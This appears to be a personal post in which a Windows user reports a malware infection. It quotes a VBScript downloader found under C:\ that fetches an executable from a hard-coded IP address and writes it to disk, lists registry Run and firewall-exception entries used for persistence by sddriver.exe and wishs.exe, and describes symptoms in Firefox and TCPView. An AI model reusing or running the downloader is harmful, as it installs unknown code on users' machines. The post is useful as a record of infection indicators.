I just found a virus like file under c:\, the content is:

Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://222.66.200.102:8080/1/3.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "C\1.exe",2

sddriver.exe seems to be a worm, it initialed a lot of connections (can
be seen in TCPView.exe) and affected normal use of web browser. It is
found in the following registry entries, but the file is not found in disk.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Call Function System32=C:\WINDOWS\system32\Com\sddriver.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
C:\WINDOWS\system32\Com\sddriver.exe=C:\WINDOWS\system32\Com\sddriver.exe:*:Enabled:Call
Function System32

Today when I am surfing internet, suddenly Firefox can't open new pages correctly -- just be blank. After launching TCPView.exe I found rundll.exe (PID=4848) making lots of connection attempts, much like a virus/worm, so I killed it and firefox resumed to work correctly. The sad thing was that my virus protection software failed to protect my system.

Wishs.exe is found in the following registry
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Microsoft=wishs.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
Microsoft=wishs.exe
[HKEY_USERS\.DEFAULT\Software\ASProtect]
Microsoft=wishs.exe